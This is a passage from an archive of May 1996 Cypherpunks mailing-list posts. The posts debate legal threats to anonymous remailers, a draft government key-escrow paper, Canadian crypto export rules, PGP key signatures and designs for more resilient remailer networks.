But there is an ongoing, vitriolic battle between the CoS and its critics,
and the remailers are one of the main "weapons" being used.

I take no sides whatsoever, merely noting that it is, in Bill Stewart's
words, "unsurprising" that CoS lawyers are taking the steps they are
taking.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 22 May 1996 13:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <199605212010.UAA18657@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to prompt faxing by Ed Roback of NIST, we have transcribed and sent
to Pat Farrell the Draft Key Escrow Paper entitled "Enabling Privacy,
Commerce, Security and Public Safety in the Global Information
Infrastructure," 25 pages (50 kb). Pat will shortly announce its
availability on his Web site. 
 
 
Much easier to grab it from Pat, but for anyone without Web access, we'll
E-mail it. Send a blank message to jya@pipeline.com with the subject
KMI_txt. 
 
 
Here's the cover letter of the report: 
 
 
____________________________________________________________ 
 
              Executive Office of the President 
               Office of Management and Budget 
                   Washington, D.C. 20503 
 
                        May 20, 1996 
 
 
MEMORANDUM FOR INTERESTED PARTIES 
 
SUBJECT:  Draft Paper, "Enabling Privacy, Commerce, Security 
          and Public Safety in the Global Information 
          Infrastructure" 
 
FROM:     Bruce W. McConnell [Initials] 
          Edward J. Appel [Initials] 
          Co-Chairs, Interagency Working Group on 
          Cryptography Policy 
 
 
     Attached for your review and comment is a draft paper 
entitled "Enabling Privacy, Commerce, Security and Public 
Safety in the Global Information Infrastructure." It presents 
a vision and course of action for developing a cryptographic 
infrastructure that will protect valuable information on 
national and international networks. 
 
     The draft paper is the result of the many discussions we 
have had with interested parties concerning the use of 
encryption. While those discussions have explored the use of 
both key recoverable encryption and non-recoverable 
encryption, the draft paper addresses an infrastructure which 
uses key recoverable encryption. We believe such a key 
management infrastructure, voluntary and supported by *private 
sector* key management organizations, is the prospect of the 
near future. It would permit users and manufacturers free 
choice of encryption algorithm, facilitate international 
interoperability, preserve law enforcement access, and, most 
importantly, provide strong system security and integrity. 
 
     Recognizing that a robust infrastructure is not yet a 
reality, we are also considering measures to liberalize export 
policy for some non-escrowed products. Appendix II of the 
draft paper begins to summarize current policy, and we intend 
to expand and improve that section. 
 
     We believe that clearly articulating such a vision will 
accelerate the ability of the United States to realize the 
full advantages of the global network for commerce, security 
and public safety. However, such a vision cannot become a 
reality unless it is widely shared. Therefore, rather than 
being a finished product, the attached paper is a draft which 
we ask you to help us improve. We hope it will contribute to 
constructive discussion and promote a clearer understanding of 
each others' needs and concerns regarding the use of 
encryption. 
 
     We welcome your comments and look forward to further 
discussion. Written comments may be sent to our attention, 
Room 10236, NEOB, Washington, D.C. 20503. 
 
____________________________________________________________ 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 22 May 1996 16:49:05 +0800
To: cypherpunks@toad.com
Subject: Re: The Twilight of the Remailers?
In-Reply-To: <adc79abe26021004b7e9@[205.199.118.202]>
Message-ID: <199605220316.UAA18744@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > Between Hacktic going down, Hal's comments that he may shut
 > down his two sites, and this, plus others who are more
 > quietly making plans to shut down, I think the thread title
 > "The Remailer Crisis" is more apt than ever.

 > As to potential liability, it is very likely to be vastly
 > more than the examples Alex cites, of $1K or "even a $5k
 > personal loss." Lawyers don't get out of bed in the morning
 > for such insignificant sums.

Yet fully anonymous mailing has always been supported by the Post
Office.  You may put anything, or nothing, as the return address
on an item to be mailed, and drop it in the dead of night into
one of millions of conveniently provided bins located almost
everywhere.

All for the quite reasonable price of thirty-two cents.

It is interesting that the above model doesn't seem to survive
parallel translation across the manifold to the TCP/IP arena.

One reason for this is that there is no Postal Equivalent of
Usenet.  If anonymously mailed items magically appeared as
articles in tomorrow's paper, for instance, one might expect
significant heat to be generated, as well as calls for the
elimination of anonymous mailboxes, and the association of a
valid ID with each item mailed.

The other reason is that the network of anonymous Postal
mailboxes is so vast, and specific individuals are not associated
with particular mailboxes.  There is no way for someone like Hal
to have rhetorical responsibility, for instance, if the Unabomber
plops his latest exploding package into a particular box.

 > It's one reason I won't run a remailer that can ever be
 > traced back to me. (I also don't have a box on the Net and
 > don't really trust running remailers on machines someone
 > else has root to. And I'm not a Unix person. And....)

Of course, Unix people can send anonymous mail without the use of
remailers.  Spoof an Ident or an IP, stuff it in some kind
person's sendmail port, and "Voila!", the mail is on its way.

Perhaps we need a remailer that automates this process.  Current
remailers all identify the sender quite clearly with a message
such as the following...

"This message was mailed by an automatic posting service.  The
sender takes no responsibility for its contents, but if you want
to sue someone for an unspeakable amount of money, my name is
Hal."

It is clear that this model for remailers fails miserably if any
significant amount of legal heat is applied.

Contrast this with a DC-Net of boxes which can covertly inject
packets into the Net, in some untracable manner.  Now we have no
identifiable "Hal" to be harrassed, and no one for the Clams to
aim their lawyers at.  Perhaps we could also do something with
Mobile Agents, which could carry an encrypted message and stuff
it into the Net from some random location.

We are certainly at the point where the notion of a "remailer" as
an identifiable source of traffic run by a specific individual is
about to bite the dust.

 > Ironically, "copyright violation" and "clam secrets" were
 > not even on the list of "the Four Horsemen of the
 > Infocalypse" that we thought would really put remailers
 > under some extreme pressure. If the Scienotologists can shut
 > down many of the remailers, imagine what the Horsemen will
 > do!

I think it's time for a slight leap forward in the technology
that is employed to provide the functionality formerly known as
"remailing."

A little increase in reliablity might not hurt either.  My
current success rate for getting something through a remailer
chain is about 50%, and that's using Ralph's reliable remailer
list as a guide.

Time for a brainstorming session.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 16:40:11 +0800
To: cypherpunks@toad.com
Subject: Re: Canada allows crypto exports
Message-ID: <adc7d578280210048424@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 AM 5/22/96, M. Plumb wrote:
>Several months ago I filed a set of export applications requesting
>permission to export cryptographic software from Canada. I learned a
>few things from these applications, my conversations with people at
>Export Controls, and my own careful reading of Canada's export laws.
>
>    There are a few countries to which you may not export anything,
>    without a permit.

Except for trading with Cuba, same countries U.S. specifies.

>    You need a permit to export most cryptographic software.

As per arrangements with U.S.

>    Cryptographic software of U.S. origin may be exported, but you
>    need to file paperwork.

Canada is the 51st state, or possibly only a terrritory or possession.

>    Cryptographic software from other countries may be exported without
>    any paperwork.

As with the U.S.

>    These are the Canadian rules. Canada interprets and enforces the
>    U.S. export laws when they think it is necessary. While the U.S.
>    government has sometimes objected to a Canadian interpretation, no
>    Canadian exporter, acting with Canadian permission, has been charged
>    by the U.S. government.

Despite the above, just how could a Canadian exporter, in Canada, be
"charged" by the U.S. government? Please explain.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lauren Amy Gelman <gelmanl@gwis2.circ.gwu.edu>
Date: Wed, 22 May 1996 13:25:30 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: NIST Draft Key Escrow Paper
In-Reply-To: <v0151010aadc7eace5b3c@[204.62.128.229]>
Message-ID: <Pine.3.89.9605212057.A9057-0100000@gwis2.circ.gwu.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 21 May 1996, Declan McCullagh wrote:

> >We've just heard back from Ed Roback of NIST that he'll fax us a copy of
> >the Draft Key Escrow Paper, which we'll scan and send to Pat Farrell for
> >his Web site. I'll ask Pat to announce it's availability when ready.
> 
> To follow up:
> 
> I think EPIC is putting last week's draft online, not this week's.
> 
> -Declan
> 
> 
It is this weeks draft, keystroked, and its at

http://www.epic.org/crypto/key_escrow/white_paper.html 

Lauren Gelman
gelman@epic.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 15:50:01 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers, Copyright, and Scientology
Message-ID: <199605220346.UAA17821@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:36 PM 5/21/96 -0500, Allen Ethridge wrote:
>Yes, the cult does have a legitimate interest in protecting their
>copyrights. 

I'm wondering whether they properly handled the copyright status of some of 
those (silly) texts.  While it is somewhat nice of you (in regards to them) 
to say what you did, it is  possible that they lost their copyrights decades 
ago by printing them (even internally) without the (then) appropriate 
"circle-C" copyright notice.  Chances are good that none of this material 
could survive a genuine copyright test case today. 



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "M. Plumb" <mp@psyche.the-wire.com>
Date: Wed, 22 May 1996 15:19:17 +0800
To: cypherpunks@toad.com
Subject: Canada allows crypto exports
Message-ID: <Pine.SUN.3.91.960521212105.15413B-100000@psyche.the-wire.com>
MIME-Version: 1.0
Content-Type: text/plain



Several months ago I filed a set of export applications requesting 
permission to export cryptographic software from Canada. I learned a 
few things from these applications, my conversations with people at 
Export Controls, and my own careful reading of Canada's export laws.

    There are a few countries to which you may not export anything,
    without a permit.

    You need a permit to export most cryptographic software.

    It is legal to export Canadian software, even cryptographic 
    software, which has no restrictions on distribution (this must be 
    explicitly stated, not just implied by being available for public 
    FTP). No paperwork needs to be filled out.

    Cryptographic software of U.S. origin may be exported, but you 
    need to file paperwork.

    Cryptographic software from other countries may be exported without 
    any paperwork.

    These are the Canadian rules. Canada interprets and enforces the 
    U.S. export laws when they think it is necessary. While the U.S. 
    government has sometimes objected to a Canadian interpretation, no 
    Canadian exporter, acting with Canadian permission, has been charged 
    by the U.S. government.


The export of cryptographic software from Canada is under review right 
now. All of this could change at any time.

A complete explanation of the process, and results is available from the 
Electronic Frontier Canada's web site at:
<http://www.efc.ca/pages/doc/crypto-export.html>

Marc Plumb
mp@the-wire.com
May 21, 1996




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 22 May 1996 17:38:51 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <199605220513.WAA14446@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  4:07 PM 5/21/96 -0700, Timothy C. May wrote:
>Sure, Alice can always herself add remailer steps. I explicitly mentioned
>this in my  message last night, when I wrote: "(Hal, to use him as the
>example, could start using his own choice of remailer hops to accomplish
>much the same result. We've talked about this for a long time, too...."
>
>But this is just using more remailers. We know this works. What Mark Grant
>was suggesting was something different, a kind of "disposable final
>emanation point," designed to go away easily under legal pressures.

Ideally the final emanation point will be epherimal indeed.  Perhaps only a
few minutes or an hour or two.  That will protect Alice against attacks of
the form, "I sent something to Alice and it was posted from the same place
as that attack on my dictitorial rule."


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 22 May 1996 19:18:10 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Senator, your public key please?
Message-ID: <199605220544.WAA17527@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 5/21/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com" 18-MAY-1996 21:54:01.23
>
>>This is exactly analogous to slanderous attack on someone's reputation.  As
>>soon as people realize that the mere fact that a key has a signature does
>>not mean that the key-owner solicited the signature, the problem goes away.
>
>        This is interesting in light of social networks analysis as applied
>to the web of trust (one interesting web-reference on such analysis is at
>http://www.mpi-fg-koeln.mpg.de/~lk/netvis.html; as well as some examples - use
>a graphics-capable web browser - it has some links to a FTP site with
>programs). One method of such analysis uses what is sometimes called "gravity;"
>under it, positions move to be close to those to which they are linked. This
>can be one-way or two-way; the above fact may imply that signing someone's key
>should move one closer to that person - and not the other way around. Of
>course, when analyzing the result, one should keep in mind that one may not
>have beneficial intent when signing a key; LD's signatures are examples. Thus,
>closeness on such a network may imply a high degree of relationship, but not
>a high degree of _positive_ relationship.

Perhaps what is needed is anti-gravity for those signitures that are not
desired by the key owner.  The resulting map should show the closeness of
the relationship.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 15:17:37 +0800
To: unicorn@schloss.li
Subject: Re: Senator, your public key please?
Message-ID: <01I4ZHDZ4B2S8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 18-MAY-1996 14:43:54.95

>Well, this depends on what we assume a signature does.

	Quite. I've been considering what the _current_ (as opposed to the
proposed) system of keys actually does. Signing a key says two things:
	A. I think that everyone who has the corresponding private key is
willing, or was willing at some point, for all the others also with the private
key to encrypt and decrypt using it. E.g., it hasn't been stolen; I'd thus be
more willing to sign a security-conscious person's key (e.g., Perry) than a
security-unconscious person's key (e.g., my mother).
	B. If there's a true email address attached, unless I'm doing this as
a joke, I think that at least one entity capable of receiving (and probably
sending) mail at that address has the corresponding private key.
	Neither of these appear to imply much patronage, unless Senators aren't
allowed to send letters of reference for security-related jobs. (I'd think the
Army could consult a Senator on whether to give someone a clearance...)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 22 May 1996 15:19:19 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Twilight of the Remailers?
In-Reply-To: <adc79abe26021004b7e9@[205.199.118.202]>
Message-ID: <Pine.A32.3.93.960521231819.18798A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 21 May 1996, Timothy C. May wrote:

> Keith Henson has been a friend of mine for the past dozen years (and I
> actually met him first in 1976), and he has kept me informed of his fight
> with the CoS. He's being sued for $100,000 by the CoS. (And they asked him
> a lot of questions about remailers, and who runs them. He didn't tell them
> much.)
> 
> I can't say whether they are likely to win their suit, or what the judgment
> might be. But make no mistake about it, if the CoS wins and Keith is
> ordered to pay....
> 

Thanks for the encouraging words. As the mailers drop off, its seeming
more and more likely that my mailer will need to be temporarily offed
also. (I would like to stress temporarily.)

Unfortunately, fewer remailers means that the mailers that are left will
be bearing an exponentially increasing amount of risk, not to mention the
increase in traffic levels overall.

The suggestion of inverting the sense of destination blocking seems the
most feasable on a short term level... and will most likely be the route
that I take for the near future.

The remailer at this account will remain up temporarily, pending further
notice.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 15:32:21 +0800
To: frantz@netcom.com
Subject: Re: Senator, your public key please?
Message-ID: <01I4ZHNMMHLM8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 18-MAY-1996 21:54:01.23

>This is exactly analogous to slanderous attack on someone's reputation.  As
>soon as people realize that the mere fact that a key has a signature does
>not mean that the key-owner solicited the signature, the problem goes away.

	This is interesting in light of social networks analysis as applied
to the web of trust (one interesting web-reference on such analysis is at
http://www.mpi-fg-koeln.mpg.de/~lk/netvis.html; as well as some examples - use
a graphics-capable web browser - it has some links to a FTP site with
programs). One method of such analysis uses what is sometimes called "gravity;"
under it, positions move to be close to those to which they are linked. This
can be one-way or two-way; the above fact may imply that signing someone's key
should move one closer to that person - and not the other way around. Of
course, when analyzing the result, one should keep in mind that one may not
have beneficial intent when signing a key; LD's signatures are examples. Thus,
closeness on such a network may imply a high degree of relationship, but not
a high degree of _positive_ relationship.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 16:49:03 +0800
To: raph@cs.berkeley.edu
Subject: Re: Remailers vs Nyms - conflicting assumptions?
Message-ID: <01I4ZI1ZZULS8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"raph@cs.berkeley.edu"  "Raph Levien" 19-MAY-1996 05:46:40.03

>Bruce Baugh wrote:
 
>> What would it take to create a nym server that could route around the death
>> or disability of any given mailer?

>Well, that would be a serious problem. The big question is: who decides
>the routing? With the existing nym setup, the client decides the entire
>route. The nymserver knows only the first hop. For the nymserver to be
>able to route around damage, it would have to know that there is damage,
>and that implies knowing the route.

	Could a reply block be restructured so as to have a series of
binary/trinary/whatever decisions embedded in it, in encrypted form? In other
words, the remailer doing the remailing knows (transiently, hopefully) to
whom it's sending. It would have a choice of two remailers to use for this,
and would wipe the other reply block (replacing it with random gibberish). If
two were down, it could do a random choice; if one was down, it would send it
via that one; if both were down, you get the same situation as currently.
	Now, one problem that I can see is increasing the length of the reply
block-perhaps greatly if it was done enough. Given the need for fixed lengths
(e.g., Mixmaster) to really get around traffic analysis, this could be a
problem.
	There's also the question (to be left up to the user) of whether you
should try any remailers again in the chain if the choice had earlier said no.
If the answer was yes, then you'd have a greater chance of it hitting a
remailer that didn't realize another remailer was down. If the answer was no,
traffic analysis would be helped by knowing - if a remailer was subverted -
that it was less likely that a particular remailer was going to be used.
Indeed, with subversion you could choose the easier-to-trace remailer to send
messages through when you had a choice.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 15:31:51 +0800
To: tcmay@got.net
Subject: Re: Instant Remailers
Message-ID: <01I4ZI9MJ3AY8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 19-MAY-1996 08:03:24.32

>At 12:38 AM 5/19/96, Mark M. wrote:

>>It is possible for someone to operate an anonymous remailer anonymously.
>>Just get a UNIX shell account under a fake name, pay with cash, and set up
>>the remailing software.  The identity of the operator of such a remailer
>>would be difficult, if not impossible, to discover.

>Now, can a site which "offers" such accounts be held liable? If the site
>drops an account when presented with _appropriate_ legal papers (a court
>order, such as an injunction), and if it takes a "hands-off" policy with
>respect to what customers run in their accounts, then it ought to be safe
>from actual liability.

	Depending on the site (e.g., governmental), it may be ethical not to
bother letting the site owner know that you're doing so anonymously. The
ethics of this would also vary depending on whether the site owner is legally
required to get ID or not.

>Ideally, such remailers should require no involvement at all by the account
>holder. Just a "start" command, by the account holder. (Not the site
>administrator, as this could be construed as involvement by him.)

>But an "instant remailer" (just add water) is needed. Recent questions here
>on the list about what it takes to run a remailer may mean some advice is
>needed.

	Quite. I'd appreciate it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 16:14:46 +0800
To: stewarts@ix.netcom.com
Subject: Re: Senator Leahy, your public key please?
Message-ID: <01I4ZITDBFUO8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart" 20-MAY-1996 03:34:34.06

>While I agree that keyservers don't need to validate keys - that's a
>job for the web of trust, and the keyserver-admin could sign keys
>if he/she/it wanted to - it may make sense for the keyservers to only 
>accept keys in messages signed by the key itself.  (Just signing the key
>doesn't help much here; you need to sign the key-plus-signatures.)
>Does it make sense to include some similar capability in PGP itself?

	I would suggest that the keyserver should simply keep track (via
keeping the signatures) of which signatures were with the key holder's
permission (signed by the key holder) and which aren't. This won't be necessary
for mutually-signing keys, of course.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 15:55:23 +0800
To: loki@infonex.com
Subject: Re: MixMaster fair use
Message-ID: <01I4ZJ03692E8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"loki@infonex.com" 21-MAY-1996 17:19:02.59

>The problem is RSAREF. I can't chose license terms for that.

	Oof... I see the problem. No, it's not you, it's them. I've forgotten
exactly what claims RSA has; patent (when does it expire?), copyright (can
it be rewritten), or trade secret (wasn't it broken?)? Without some form of
getting around this (or licensing from them), usage for pay will be kind of
difficult.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 17:17:04 +0800
To: bruce@aracnet.com
Subject: Re: The Crisis with Remailers
Message-ID: <01I4ZJKR871W8Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 19-MAY-1996 04:10:44.56

>a point here. I don't think most cypherpunks realize how anonymity is
>perceived out in the net at large.

>Take news.groups, a fairly important group I happen to read regularly. With
>the exception of Rich Graves' presence, _all_ the uses I see there are for
>cowardly abuse in a way that lets the poster escape having to answer for his
>views. I'm not talking about presenting important information where
>wrong-headed authorities could engage in reprisals, either, but baseless
>accusations of theft, child abuse, and just plain torrents of obscenity.

	Would you suspect that having more warning labels (before & after,
not just in the headers) would help with any negative reputation thus
generated?

>That's _all_ it's used for (again, with the exception of Rich).

>There's a problem here. It's one thing to say that the benefits of anonymity
>outweigh the problems. I'm inclined to that view myself. But it's much
>harder to defend that view in a forum where anonymity is used so commonly
>for problematic ends, and to offer anything in the way of constructive
>solutions. It would be pleasing to see more cypherpunks actively dealing
>with these problems out there in net.land.

	You might try pointing out that the only remailing that people see is
for allegedly illegitimate reasons. Psychiatrists who are beginning to interact
with patients over the net certainly have a good cause to use such remailers...
including to prevent governmental tapping, given A. authoritarian governments
such as China (blackmail for espionage purposes, for instance); and B. insane
U.S. legal decisions like the one I heard about on NPR on 5-21, in which a
judge ruled that there was no confidentiality protection prohibiting turning
over psychiatric notes. One wonders what that judge's reaction (and the lawyer
who asked for the notes) would be to having their confidential documents
put into public view... I see no reason to give lawyers more of a privilege
than religious/psychiatric individuals.
	-Alle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 16:13:46 +0800
To: tcmay@got.net
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <01I4ZJRNMRX68Y5IL9@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 20-MAY-1996 06:17:52.64

>But any country that is "anti-Scientology" is likely to be repressive in
>various ways we would find inimical to our goals. Germany is a prime
>example: yes, they have placed restrictions on the CoS, but they have also
>ordered crackdowns on Internet sites.

>Whatever one may think of Scientology, or Catholicism, or Baalism, or
>whatever, crackdowns by the government ("anti-Scientology,"
>"anti-Catholic," etc.) is not a good thing.

	I do not disagree with that countries shouldn't place any more
restrictions on Scientology than they do on any other profit-making business.
It's simply that a remailer operator would be more likely to win in court in
such a country; if Scientology isn't _allowed_ in a country, this isn't good
but they at least can't exactly do any nuisance suits. To a lesser degree,
they might be suable back very easily if the judge & jury were sympathetic. I
got the basic idea from the regulatory arbitrage section in your Cyphernomicon,
as it happens.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 22 May 1996 21:35:41 +0800
To: "E. ALLEN SMITH" <loki@infonex.com
Subject: Re: MixMaster fair use
Message-ID: <adc871ef0102100449fd@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:14 PM 5/21/96, E. ALLEN SMITH wrote:
>From:   IN%"loki@infonex.com" 21-MAY-1996 17:19:02.59
>
>>The problem is RSAREF. I can't chose license terms for that.
>
>        Oof... I see the problem. No, it's not you, it's them. I've forgotten
>exactly what claims RSA has; patent (when does it expire?), copyright (can
>it be rewritten), or trade secret (wasn't it broken?)? Without some form of
>getting around this (or licensing from them), usage for pay will be kind of
>difficult.
>        -Allen

It is patent on RSA, which expires in 2000 as I remember. It can be
licensed, but it is not cheap. I don't know how they would handle a free
program which people pay to use.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 22 May 1996 21:28:09 +0800
To: Ben Holiday <remailer-operators@c2.org
Subject: Re: An alternative to remailer shutdowns
Message-ID: <adc872de0302100481bb@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


Might Rot13 be enough? It would prevent accidental viewing.

        -Lance

At 12:39 PM 5/21/96, Ben Holiday wrote:
>After pondering a bit it seems to me that the "knock knock" remailer
>approach (only send anon-mail if the recipient agrees to receive it) could
>be made feasable pretty easily.
>
>Rather than hold the mail while waiting for a consent to release, you
>could simply encrypt the peice of mail with a symetric algorythm on its
>final hop, and send the encrypted mail to the recipient.
>
>At this point there are 2 options, which I havnt examined closely: The
>first is that you require them to send a request for their "consent-code"
>which can be used to decrypt the mail. Under this arrangment you could
>possibly provide for a user to specify a specific consent code, so that 2
>party's who had previously agreed to communicate could avoid "knocking".
>If you strip the subject, then it would be all but impossible for a person
>to include the consent code in the actual peice of mail.
>
>The second is to simply include the
>consent-code along with the encrypted peice of mail and a legal notice
>stating that decryption of the mail constitutes your consent to receive
>the mail, as well as your agreement to hold the remailer-operator harmless
>should the mail be found to be in some way offensive. Further, the
>recipient would agree to be solely liable for the contents of the mail,
>etc etc.. I leave the actual agreement to the net.lawyers to figure out.
>
>As far as I can tell an agreement of this form would be at least as valid
>as the software licenses ("NOTICE: Opening this envelope constitutes your
>agreement to the terms.. blah blah blah") that are commonly used today.
>Also would seem to be a similar concept to "Opening the case of this
>device void's your warranty" stickers on appliances.
>
>Under this approach persons would receive mail whether they'd consented or
>not (unless they requested to be blocked). But it would be difficult for
>anyone to raise any serious legal issues about something they havnt read,
>and impossible for them to make noise about what they read, after the
>implied consent they gave when decrypting.
>
>Under both approaches it would be wise to have a list of addresses who've
>already consented, which would contain all of the known remailers..
>whether or not an operator chose to have names besides remailers in the
>list would be at his/her discretion.
>
>Ben..

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 22 May 1996 20:04:40 +0800
To: snow <cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <adc875e00402100436b2@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:39 PM 5/21/96, snow wrote:
<SNIP>
>
>        Randomize the output remailer? Sometimes Alice exits Bob,
>Sometimes Charlie, sometimes Tom etc.
>
>
>Petro, Christopher C.
>petro@suba.com <prefered for any non-list stuff>
>snow@crash.suba.com

A list of reliable back end remailers (output) could be kept, and
automatically used by the front end remailers. This would allow the back
end remailers to be highly transient, but keep the remailers used in chains
stable.

A remailer would randomly choose one of the 99% reliable back end remailers
for each outgoing message.

This could be done even more disposably using alpha type nyms.
Speaking of which, it looks like my nym server is working:
alias@alias.cyberpass.net
Send to help@alias.cyberpass.net for instructions and the key.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 22 May 1996 17:05:37 +0800
To: cypherpunks@toad.com
